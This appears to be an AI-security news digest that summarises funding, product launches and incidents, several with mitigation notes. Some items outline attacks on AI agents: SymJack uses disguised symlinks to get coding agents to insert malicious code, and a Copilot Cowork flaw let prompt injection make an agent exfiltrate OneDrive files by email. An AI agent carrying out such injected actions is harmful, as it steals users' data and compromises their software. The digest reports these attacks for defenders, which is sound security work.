New tools, products, platforms, funding rounds, and company developments in AI security.
RevEng.AI, a cybersecurity startup, raised $15 million to develop an AI tool called BinNet that analyzes compiled software binaries (the machine-readable code that actually runs on computers) to find vulnerabilities and backdoors without needing the original source code. The technology aims to secure the software supply chain by verifying what software actually does before it's deployed, which is increasingly important as AI systems are used to write code automatically.
Cisco partnered with OpenAI to integrate Codex (an AI code generation tool) directly into their enterprise software engineering workflows, treating it as an AI teammate rather than just a developer productivity tool. By using Codex in production environments, Cisco accelerated development on products like AI Defense (a security solution protecting against AI-related risks), compressing work that normally takes quarters into just weeks, while also automating large-scale defect repairs and build optimization across interconnected code repositories.
SymJack is an attack that exploits AI coding agents by tricking them into inserting malicious code into software projects through disguised symlinks (shortcuts that point to files). The attacker controls a code repository and hides malicious instructions in an innocent-looking file request, which the AI agent approves and executes without the developer realizing what's happening, potentially stealing credentials or compromising production systems.
An analysis suggests that parts of Pope Leo XIV's encyclical (a formal letter from the Pope) about AI's dangers may have been written by AI itself, with some sections scoring 40-100% AI-generated according to Pangram, an AI detection tool. The document shows linguistic patterns common in AI writing, such as unusual word frequency that matches Claude, an AI made by Anthropic.
Warp, a modern terminal application, is using GPT-5.5 to power AI agents (software programs that can autonomously plan and execute tasks) that help write code and manage open-source development. In Warp's internal testing, GPT-5.5 uses 30% fewer tokens (units of text that the AI processes) per coding task than GPT-5.4, making the system more efficient as it scales to handle longer, more complex workflows.
Pope Leo XIV released an encyclical (a formal church letter) warning that artificial intelligence could displace workers, increase inequality, and remove humans from lethal weapons decisions, but Trump administration officials disagreed on how to respond. Interior Secretary Doug Burgum dismissed the pope's concerns as outside his role, while Vice President JD Vance praised the message as important moral leadership, highlighting a split in the administration over whether AI should face stronger oversight or remain deregulated for competitive advantage.
Microsoft Copilot Cowork had a security flaw where its agents (automated systems that perform tasks) could send emails to users without approval, and these emails could contain external images that leak data when opened. An attacker could use prompt injection (tricking the AI by hiding instructions in its input) to make the agent create download links to files on OneDrive, allowing the attacker to steal those files.
Many organizations want to adopt agentic AI (AI systems that can independently execute complete workflows with minimal human input), but 76% say their current operations cannot support this change. The problem is that most companies are simply adding AI agents onto existing human-centered business models rather than fundamentally redesigning their operations, technology, workflows, and decision-making systems to work with AI as an integrated part of the organization.
The Megalodon campaign used compromised credentials to inject malicious commits into over 5,500 GitHub repositories, modifying GitHub Actions workflows (automation tools that run code tasks) to steal sensitive secrets like cloud credentials and SSH keys (authentication files). The attack hid malicious code in base64-encoded bash payloads (encoded script commands) and used fake author names like "build-bot" to disguise itself as routine maintenance, with researchers detecting unexpected workflow runs as a warning sign.
Google CEO Sundar Pichai discusses major AI changes coming to Google Search and YouTube, including new Gemini models (advanced AI systems for generating text and understanding information) and AI agents that can perform tasks rather than just deliver search results. These changes will likely reduce traffic to websites from Google Search, a phenomenon the interviewer calls 'Google Zero,' forcing publishers and content creators to adapt their business strategies.
Check Point launched a proactive Frontier AI Models Readiness Program to protect their products against threats from increasingly capable AI systems that could help attackers find and exploit vulnerabilities. The program involved scanning their code with AI tools, reviewing security, strengthening weak components, and speeding up their ability to create and release security patches.
Shadow AI refers to unapproved AI tools that employees use without IT oversight, often gaining access to company data through OAuth (a login system that grants third-party apps permission to access accounts) or browser sessions. Most organizations lack visibility into these tools and don't have governance policies in place, creating a security risk. The article describes a five-step program to manage shadow AI by discovering which tools are in use, creating practical policies, and establishing approved alternatives.
Fix: The source explicitly recommends five steps: (1) Discover shadow AI tools through auditing OAuth connections, scanning browser extensions, identifying AI features in already-approved tools, and conducting employee surveys. (2) Write an AI governance policy that lists approved tools, defines clear data classification rules (specifying which data like customer records and source code should never enter AI tools), confirms data training opt-out status for each tool, and establishes a defined process for requesting new tools. (3-5) The text cuts off before fully detailing steps 3-5, so no additional mitigations are explicitly stated in the provided content.
The Hacker NewsFix: Anthropic hardened Claude Code to resolve symlinks (determine where shortcuts actually point) before asking for approval and display the real destination path in the prompt to the user. The source notes that persuading users to consider before acting on automation requests could help stop SymJack attacks and would be simple for other coding agents to implement.
SecurityWeekAdvanced AI models like Claude Mythos are becoming autonomous cyber-attack tools that can identify vulnerabilities, chain multiple exploits together, and conduct multi-stage attacks with minimal human input, fundamentally changing how cyber offense and defense operate. Major tech companies have formed a defensive coalition (Project Glasswing) to respond to this emerging threat, signaling that AI-powered cyber operations have moved beyond experimentation into real operational capability. This represents a shift in cyber doctrine where speed, scale, and autonomy (the ability of AI to act without human direction) have become the defining factors in cyber conflict.
Data security posture management (DSPM, tools that help find sensitive data scattered across systems) helps security teams locate hidden data across cloud and on-premises environments to reduce data loss risk. Shadow data (data stored outside official IT oversight) can come from forgotten repositories, cloud containers, or unauthorized AI usage, making it difficult to track and protect. DSPM tools work alongside broader cloud security tools to discover both known and unknown data and manage exposure risks, with the market consolidating through major acquisitions by companies like Palo Alto Networks, IBM, and Varonis.
Tax AI is a system built by OpenAI and Thrive Holdings that uses Codex (a code-generating AI model) to automate tax return preparation for accounting firms, and it improves itself automatically rather than waiting for engineers to manually fix problems. The system learns from real-world use by collecting practitioner feedback, tracking how returns are processed (production traces, or a structured record of inputs and outputs), and using tailored evaluations to continuously refine itself. Within six weeks of launch, the system improved from only 25% of returns being correct enough to need minimal fixes to 86% reaching that standard.
Fix: The source describes the infrastructure that enables self-improvement but does not prescribe a specific fix or mitigation for any problem. No version update, patch, or explicit remediation step is mentioned. N/A -- no mitigation discussed in source.
OpenAI BlogAnthropic released two new security features for Claude: a self-hosted sandbox that lets Claude Managed Agents (AI systems that can perform tasks autonomously) run code in user-controlled environments like their own servers or managed providers, and a security guidance plugin for Claude Code that scans for vulnerabilities (weaknesses that attackers could exploit) as developers write code. The plugin has reduced security issues by 30-40% in internal testing by catching problems before formal code review.
Fix: Anthropic provides two explicit mitigations: (1) Deploy the Claude sandbox by configuring Claude Managed Agents to execute tools in a user-controlled environment, applying your own network policies, audit logging, and security tooling while keeping files and repositories within your perimeter; (2) Use the security guidance plugin for Claude Code, available through the official Anthropic marketplace, which scans for vulnerabilities during file edits, after AI-generated changes, and at commit time to catch issues before full code review.
SecurityWeekMicrosoft is previewing automatic device isolation in Defender for Endpoint, a feature that uses AI to quickly disconnect compromised devices from the network while keeping them connected to security services, helping contain attacks that move at machine speed. However, a SANS Institute research paper warns that attackers could potentially exploit this feature to disable user accounts if it is not properly configured and tuned. Security experts emphasize that autonomous AI action tools like this must be carefully configured and tested, similar to any other automation capability.
Champion ethical hacker Valentina Palmiotti warns that powerful AI tools like Claude Mythos (an AI model that can find vulnerabilities, or security weaknesses, in software) could soon make human hackers like her unable to compete in bug bounty competitions (where hackers earn money by finding security flaws before criminals do). While she currently uses AI tools like Claude Code to work faster and win prizes at the Pwn2Own hacking competition, she believes advanced AI models will eventually take over most of the easier hacking tasks, leaving only the very best human hackers with opportunities to find new bugs.
Companies need strategies for using agentic AI (AI systems that can plan and execute multi-step tasks independently), but security tools to safely deploy these systems are still being developed. The main obstacle preventing wider adoption is the lack of proven security solutions to protect enterprises from risks that agentic AI introduces.
Fix: SafeDep recommended checking GitHub Actions tabs for unexpected workflow_dispatch runs (manual workflow triggers), and if using OIDC federation (a cloud authentication method) for deployments, review cloud audit logs for token requests from unknown workflow runs. The researchers also shared a list of indicators of compromise (IOCs), including the attacker's command-and-control domain (216.126.225.129:8443), campaign signatures, forged author names and emails, commit messages, and names of compromised repositories to aid in detection and cleanup.
CSO OnlineVaronis Atlas has integrated with the Claude Compliance API to help organizations monitor and secure their use of Claude Enterprise and Claude Platform, which are AI tools used for tasks like document analysis and building custom applications. The integration allows security teams to track AI usage, detect misuse and sensitive data exposure, investigate complete chat sessions, and test for vulnerabilities like prompt injection (tricking an AI by hiding instructions in its input) and jailbreaks. Varonis Atlas connects AI activity to underlying data permissions and access controls to help organizations understand what data their AI systems can reach and whether that access is safe.
Fix: The source does not explicitly describe a specific fix or mitigation for a particular vulnerability. Instead, it describes Varonis Atlas's features for monitoring and securing AI systems: continuous monitoring of conversation content, real-time detection of sensitive data exposure and jailbreak attempts, session-level investigations, runtime guardrails, and proactive pen testing (stress-testing assistants and agents for vulnerabilities). Organizations can access these capabilities through the Varonis Atlas platform, including its AI inventory, posture management, security testing, runtime guardrails, and compliance reporting functionality.
BleepingComputer